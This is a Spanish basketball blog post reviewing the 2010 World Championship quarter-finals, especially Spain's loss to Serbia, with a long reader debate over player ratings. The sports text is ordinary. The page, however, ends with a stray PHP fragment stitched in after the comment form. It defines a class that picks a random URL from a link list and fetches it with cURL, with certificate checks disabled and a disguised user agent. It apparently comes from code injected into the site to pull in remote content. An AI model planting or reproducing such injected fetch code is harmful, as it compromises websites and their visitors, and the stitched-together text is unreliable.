Mundobasket 2010: Resumen cuartos

10 de September de 2010 por TheDeerHunter

Llegó el momento de la derrota. Siempre llega. Hay que remontarse muy atrás en el tiempo para ver a la roja volver sin metal colgado del cuello. El cruce de cuartos…

Serbia 92 – España 89: La lotería en forma de triple de Teodosic desde casi 10 metros, colofón de uno de los peores ataques que uno haya podido ver diseñar a un base, pasará a la crónica negra de la España deportiva. Quizás en el futuro no será tan recordado como otros episodios célebres y el motivo podría ser que, siendo honestos, los ahora ex-campeones han mostrado al mundo más sombras que luces.

Anticipábamos recientemente que nos preocupaba la defensa de perímetro y por ahí empezó a fraguarse la derrota. Los serbios nos clavaron nada menos que un 15 de 30 en triples (45 de sus 92 puntos) con algunos lanzamientos extremadamente afortunados pero la mayoría fáciles y lógicos originados por desequilibrios producidos  fundamentalmente desde las posiciones de alero. Tratar de tapar los agujeros con la zona (no demasiado acertada tampoco, por cierto) fue incidir más en el problema que en la solución. Han faltado alternativas tácticas y nos queda la duda de si es que no existían o directamente no han estado estratégicamente inspirados. Los Velickovic y Bjelica por un lado más Keselj y Savanovic por el otro, difícilmente podrán encontrar en el futuro un partido tan plácido para todos ellos simultáneamente. Los clavos del ataud. Dignos semifinalistas.

Adicionalmente ha sido una lástima no poder disfrutar, por unas razones o por otras, de lo mejor de cada uno de esta excelente selección. Sólo Navarro ha destacado con continuidad y lo que más duele es que su inmenso partido y campeonato no vaya a servir para nada. Otra vez será. Como diría el T-1000: “Volveré…”-mos.

Turquía 95 – Eslovenia 68: Hay que ver cómo están los turcos. Palizón, y ya son varios, inflingido a otro de los equipos que a su vez habían apalizado a otros rivales y es que los eslovenos no son precisamente unos mancos. Lo que sí se les puede reprochar es su tradicional inconsistencia que volvió a ponerse de manifiesto en este choque. Partido desastroso de Dragic, muy tímido de Lakovic y Brezec y desacertado de Nachbar, Slokar y Becirovic que fueron lo poco salvable del equipo. Frente a un 70% en tiros de 2 y casi un 60% de 3 poco se puede hacer y habla muy mal de la defensa que opusieron los hombres de Memi Becirovic. También es cierto que los turcos estaban en un día de esos con el sol de cara y les salía hasta lo que no intentaban. Así es casi misión imposible contra un equipo tan potente y compensado en todas sus líneas.

En el equipo turco por primera vez vimos claramente el liderazgo claro de Ilyasova y Turkoglu al mismo tiempo. El resto bien o muy bien. El infierno otomano cada vez se calienta más.

USA 89 – Rusia 79: Punto final muy digno de los rusos. Como mínimo forzaron a sus rivales a ponerse el mono de trabajo que es mucho más de lo que pueden decir la mayoría de equipos. David Blatt le buscó las cosquillas a “Coach-K” tratando de imponer altura. Lo consiguió sólo parcialmente  por culpa del inmenso trabajo de ese extraño elemento que es Lamar Odom. Blatt falló en cambio en otro aspecto y es que si no cuidas el balón contra estos tíos estás perdido. Estados unidos robó hasta 14 balones con sus consiguientes contragolpes definitivos. Por momentos el equipo USA recordó a los Thunder, con la dupla Durant-Westbrook machacando el hígado del rival con eléctricos contraataques. Con la jornada de ayer que a nadie le extrañe un MVP para Durant. Debemos hacer mención especial también a Billups, que está siendo el mejor y el más regular base del campeonato con mucha diferencia.

Por último hacer mención a que Khryapa no ha llegado a jugar ni un sólo minuto en este campeonato. Una lástima y, a toro pasado, una mala decisión el haber decidido traerlo.

Lituania 104 – Argentina 85: Amarga despedida de Luis Scola de su más brillante campeonato. Los lituanos le hicieron pagar el esfuerzo del otro día preparándole un marcaje múltiple que le dejaron asfixiado. Delfino, bastante liberado, pudo brillar, pero  estuvo demasiado solo. Podemos entender porqué se quejaba Scola el otro día de su equipo tras haber realizado uno de los mejores partidos (si no el mejor) de toda su vida. Los argentinos tienen una plantilla demasiado justa. Brasil fue su techo pero también un decisivo desgaste. Quitando a Delfino y la floja aportación de Scola y Hasen, nadie más se acercó a las dobles figuras.

Por contra, Jasaitis (19), Kleiza (17), Delininkaitis (16), Pocius (16), Kalnietis, Maciulis y Jankunas (12 cada uno) superaron eficazmente la decena. Sin olvidar la buena aportación defensiva de Javtokas. Demasiada artilleria sin demasiada oposición. Que se preparen los USAnos.

Comenta

14 comentarios a esta entrada

  1. Txusma dice:
    #1

    La jugada final de Serbia para ganar el partido es una auténtica porquería (me recuerda a una de Carlos Arroyo cuando estaba en el Macabi) pero Teodosic la clavó y nos hechó del Mundial.

    Y sobre nuestra jugada final supongo no sé si la idea era sorprender con Navarro sacando de banda, pq si nó la pelota tendría que haber sido para él o para Rudy, claramente. Le llegó a Garbajosa bastante lejos del triple, así q era casi imposible haber hecho nada.

    No creo que haya q hacer limpia o q la seleccion de basket se merezca ser lanzada a los leones… El entrenador puede cambiar pq tampoco he tenido la sensación de q fuera tan decisivo como si me lo parecían Pepu o Aito, pero el relevo de los jugadores ha de ser bastante natural. Con Calderón de vuelta la cosa en la dirección puede mejorar y a parte de Ricky pues habría q ver si recuperamos a Sergio Rodríguez para la causa. Navarro a lo mejor puede bajar su minutaje para entrar más enchufado y más encarado al ataque (Rudy que pase a ser el 2 titular con Llull/Saul Blanco de suplentes) y Claver/Suárez/Aguilar deberían empezar a aparecer con asiduidad. Incluso en la posición de 3 podría entrar al principio San Emeterio en plan Carlos Jimenez, jugadores poco valorados pero muy importantes. Y en el juego interior pues lo q aguante Pau pq tampoco se ve muy claro lo q viene por detrás. Tal vez Mirotic a la larga. Se preveé un agujero bastante grande en la posición de 4, no? En el 5 Marc y Vázquez deberían bastarse y es q Marc no es peor q ningún pívot europeo ahora mismo por mucho q no haya hecho el campeonato esperado.

    La pregunta es: aguantamos con lo q tenemos hasta Londres 2012 y a partir de allí reconstrucción o empezamos ya? Para clasificarse para los JJOO habrá, o q llegar a la final de Europeo, o conseguir sacar una de les 3 o 4 plazas en el preolímpico.

      Citar

  2. Love Denise dice:
    #2

    no pienso que deba haber una reconstrucción, para reconstrucción la argentina jajajja

    En serio, los 12 que han ido pueden estar perfectamente para Londres , bueno, todos menos Claver que es un pufo,
    La reconstrucción llegará después del mundial de 2014, cuando Navarro, Pau, Reyes, Mumbrú, Calderón, se retiren, y Marc, Rudy y Ricky dejen de ir a jugar con la selección porque juegan en la NBA.
    a partir de ahí, no hay nada más, las generaciones sub 18 o sub 20 españolas son pésimas, después del 2014, la selección sudará para clasificarse para los campeonatos.

      Citar

  3. Txusma dice:
    #3

    Eso es optimismo y el resto tonterias…

      Citar

  4. Love Denise dice:
    #4

    A falta de 1 partido pongo nota a la selección:
    Ricky : 2, simplemente nefasto, debió asumir mas responsabilidad ofensiva y más tras la baja de Calderón.
    Lopez: 5, Demasiado ha hecho el hombre para no haber hecho una preparación
    LLull: 5, irregular, tiene la excusa de la lesión previa al mundial
    Navarro : 10, Impresionante, matricula de honor
    Rudy: 7, podría haber hecho algo más
    Mumbru: 5, jugando a su nivel, ni bien ni mal
    San Emeterio : 5 (lo poco que ha jugado no lo ha hecho mal)
    Claver: 0, actitud pasota , careto avinagrado, apático, PUFO
    Garbajosa : 8 , sorpresa positiva, tirando de 3 como en 2006.
    Reyes: 6, he visto mejores versiones de Felipe.
    Vazquez: 10, sorpresa positiva, le ha echado eggs.
    Marc: 7, poco resolutivo, nada desequilibrante para el rol que tiene, quizás infrautilizado por el sistema.

    Iturriaga ayer a las 18:20 ” Nadie pintará la cara a Argentina, nadie es capaz de darle una paliza”” jajajaj

      Citar

  5. Txusma dice:
    #5

    Un 0 para Claver? A ver, como puedes ponerle un 0 si en 2 años creo q no ha jugado ningún partido importante con la Selección. Según tu pone cara de avinagrado y parece apático pero a mi tb me costaría ir a los campeonatos para agitar simplemente la toalla. Aún así, no creo q hayas leído en ningún sitio declaraciones suyas qjandose o rajando de nadie. Si la nota va en función solo de tus “objetivas” observaciones no puedo considerarla justa. Y ojo! Q no digo q Claver sea un crack ni nada de eso.

      Citar

  6. Love Denise dice:
    #6

    es un jugador frio, apatico, con una actitud desesperante tanto con España como en el Pow. Valencia, como si todo le importase un pito, como si estuviese de vuelta y tuviera su carrera hecha habiendo ganado todo.
    que va a los campeonataos a agitar toallas?? pero si deberia estar agradecido de que lo seleccionan entre los 12!!, el año pasado, por ejemplo, con la renuncia de Jimenez y que Mumbru se lesionó en la preparación, tenía el camino despejado para consolidarse como el 3 de España, en cambio, no demostró nada, este año, más de lo mismo.
    Jugador con cualidades fisicas, pero desparovechadas totalmente. Su lugar está en la selcción rusa o eslovena, donde se acumulan potenciales cracks que se han quedado por el camino.

      Citar

  7. TheDeerHunter dice:
    #7

    En absoluto. En el power Calver es indiscutible… y no debería ponerme a recordar que ganó un premio individual europeo el año pasado además del título.

    Tus notas de él y Ricky son de traca.
    No tienes en cuenta que son unos chiquillos. A sus edades, no te contaré lo que se decía, por ejemplo, de Chancey Billups. Sin irnos demasiado lejos de uno de los mejores de este campeonato.

    No creo que Ricky haya estado bien… pero tampoco lo mal que lo pinta todo el mundo. El papelón de haber tenido que asumir la titularidad de una posición tan complicada de manera tan accidental (las lesiones de Calderón) es de tres pares… y lo ha hecho con la dignidad de un veterano. No quiero hacer mención a su currículum ni a su responsabilidad en él… que no lo tenía ni Pau Gasol a su edad. Ni de lejos Calderón, Navarro, Jimenez o Garbajosa por mentar a los mejores (hablo de memoria, ojo)
    No veo mal que se le hagan ciertas críticas y le irán bien algunas para poner los pies en tierra… pero en este país se pasa de la crítica a directamente el ensañamiento. Somos unos cainitas, ya lo dice Reverté… y lo clava.

    Y otra cosa más. Este no está siendo un mundial de bases… estando tan mal Ricky ha sido uno de los mejores del campeonato. Le ha faltado meter un churrazo de casi medio campo como otros, eso es todo.

      Citar

  8. CAMPO2 dice:
    #8

    yo creo que jugar con Garbajosa y Gasol juntos al nivel que estaban era un suicidio, daba pena ver los rebotes ofensivos que permitian, no se como puede jugar con Garbajosa cuando este año no a jugado precisamente bien, que al final le quito la titularidad Reyes, y Fran Vazquez ha hecho una gran temporada.

      Citar

  9. Love Denise dice:
    #9

    Barea, Huertas, Khvostov, Kalnietis, Prigioni, Teodosic, Lakovic, …y sin mencionar a Billups, Rose y Westbrook.
    Todos ellos han jugado a un nivel muy superior al de Ricky Rubio.

      Citar

  10. TheDeerHunter dice:
    #10

    Si llamas jugar a un nivel superior los 3,9 puntos y 1,6 asistencias de Khvostov…

    A Rose, ni Lakovic y si me apuras a Westbrook y Kalnietis se les pueden meter en este saco, pues buena parte de su producción es desde otra posición que está lejos de ser la de base.

    El quinteto ideal para Teodosic es una injusticia política. No ha hecho ni mucho menos un buen mundial… los únicos que te admito son Billups, Huertas (los dos mejores bases con diferencia)… y quizás Barea, que a este último no le he visto jugar. Yo añadiría a Spanoulis, aunque el partido contra España no fue su mejor actuación.

    Prigioni a estado al nivel de Ricky… pero sin defender ni lejanamente como Ricky.

      Citar

  11. sergio dice:
    #11

    Buenas gente… ya he terminado examenes, vacaciones y demas. Me alegra veros a todos por aqui de nuevo.

    Mi valoracion de la seleccion española en el Mundobasket no puede ser mas negativa. Critico las actuaciones personales de gran parte de los jugadores (excepto Navarro, Rudy, Vazquez y Garbajosa (ofensivamente hablando), los demas han estado muy por debajo de lo exigido.

    Soy de la opinion de cargar sobre Scariolo gran parte de la culpa. No considero que fuera mas q ligeramente responsable del Europeo del año pasado. No creo q ganasemos por sus sistemas sino por la implicación defensiva de todos los jugadores a partir de las eliminatorias y la derrota contra Turquía. No recuerdo ninguna buen planteamiento puntual en alguna jugada que saliera demasiado bien.

    Y casi mejor que no llegasemos a la final del Mundobasket teniendo a Garbajosa para defender a Durant….

    P.D: EL BBVA se ha convertido en patrocinador oficial de la NBA y WNBA (amen de las ligas española y de Puerto Rico) durante 4 años. Falta concretar a que nivel llega el patrocinio… dudo que la NBA pase a llamarse NBA BBVA… (que mal queda Dios ¬¬)

      Citar

  12. Love Denise dice:
    #12

    Quise decir Bykov ( el otro base ruso) no Khvostov, pero ahora que miro sus estadisticas, pues también ha hecho un campeonato mejor que Ricky, hasta el 2º base ruso ha jugado mejor que “el niño maravilla”. En anotación, sólo ha anotado 5 puntos menos que el nuevo “Pete Maravich” jugando casi 100 minutos menos !!!! (2 partidos y medio completos), y, al menos tiene porcentajes dignos de un juagdor de baloncesto, no el 27 % en tiros de campo y el 11% en triples de New Maravich. Además, ya no son solo sus numeros, es la patetica sensación que ha dado en el campeonato. No digo que sea un pufo, pero vamos…quien no reconozca el horrible campeonato de Rubio es que no quiere verlo. cuántas pelotas perdió ayer vs Argentina, cuántas malas decisiones ha cometido en todo el torneo???, y no le eches la culpa a la edad, la presión, bla bla bla, que a pesar de su edad ya es un “veterano” y ha jugado muchisimos partidos con mas presión y haciendolo medianamente bien. Pero debes reconcoer que su torneo ha sido penoso.

    Por cierto, como osas decir que Prigioni ha estado al nivel de Ricky??? y ayer vs Spain?? porque le dio un baño y una lección de juego cada vez que se cruzaron en la cancha. El unico partido malo que tuvo fue frente a Lituania, ( en el que estuvo mal todo Arghentina en conjunto) .

    Si Kalnietis, o Westbrook no son bases, menos aún Spanoulis, el ataque griego está dirigido en su mayor parte por Diamantidis. Incluso Zisis es mas base que Spanoulis.

      Citar

  13. TheDeerHunter dice:
    #13

    Vamos a ver… yo no he dicho que Ricky haya jugado bien. ¿Pero para ponerle un 2? ¿un 0 a Claver??… ¿y me pides que reconozca qué??
    Lo único que se le puede achacar a Ricky es su responsabilidad anotadora. En esa faceta y exclusivamente en ella sí podrías ponerle una mala nota. Un 2 o lo que tú quieras… pero si no iba a estar acertado al menos no ha absorvido muchos tiros. Para mí una cosa o la otra no es un defecto obligatoriamente y mucho menos en este momento de su desarrollo y en esta selección. Algunos de los mejores bases de la historia han sido pésimos tiradores… y ahí esos 19 años por supuesto que son atenuantes porque es una faceta que se mejora con el tiempo (y te puedo poner un millón de ejemplos) Por cierto, que a toro pasado y siendo resultadistas podemos hablar de ello, pero en otros campeonatos su tiro no nos ha hecho falta para nada terminando campeones y subcampeones. A los hechos me remito.

    El equipo no ha funcionado especialmente mal con su dirección. Hay otros factores que han hecho que españa fracase. No precisamente la dirección. Ricky ha sido uno de los mejores pasadores del campeonato. A 40 minutos sólo le supera Priggioni y por poco… pero ya que hablabas antes de las malas decisiones y de los balones perdidos por ahí el argentino es mucho peor. Su ratio de pérdidas viene a ser similar al de Marcelinho y bastante mejor que el de Billups, para que nos hagamos una idea. Un ejemplo muy bueno para desechar la idea de lanzarlo a los leones. Insisto, en esta faceta el detalle tener 19 años también me parece significativo. Me gustaría que me iluminaras cómo dirigían Huertas o Billups a esta edad. De risa, oye.

    Y por último la defensa. Estando mal y sin defender a su nivel ha sido de lo mejor de nuestro perimetro. Si algo ha fallado desde luego no ha sido especialmente él. Podemos recordar la defensa a Spanoulis. La de Priggioni, por ejemplo… ha sido de todo menos lejanamente buena. Ahí no hay color.

    Hablando Spanoulis es un base total. Anota (por supuesto) y distribuye como el que más en Grecia… más que Diamantidis (que es cierto que ayuda en ese aspecto) e infinitamente más que Zisis (que creo que no le he visto hacer eso que dices en toda mi vida) Y no he dicho que Kalnietis o Westbrook no sean bases. He dicho que han jugado de 2 mucho. Los que han jugado únicamente de 2 han sido Lakovic y Rose.

    Por último dos cosas. Lo del “New Maravich” es una sandez y lo ha sido siempre (no digo que es una sandez tuya) Sólo lo dijeron quienes o bien no conocían a Ricky o bien no tenían ni idea de quien era Pete Maravich.
    La otra es que cargar la responsabilidad de una selección que trata de ser campeona del mundo a un chaval de 19 años es una absoluta y llana locura. Lo mires por donde lo mires.

      Citar

  14. Love Denise dice:
    #14

    en absoluto desacuerdo , pero en fin…ya dije todo lo que tenia que decir al respecto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>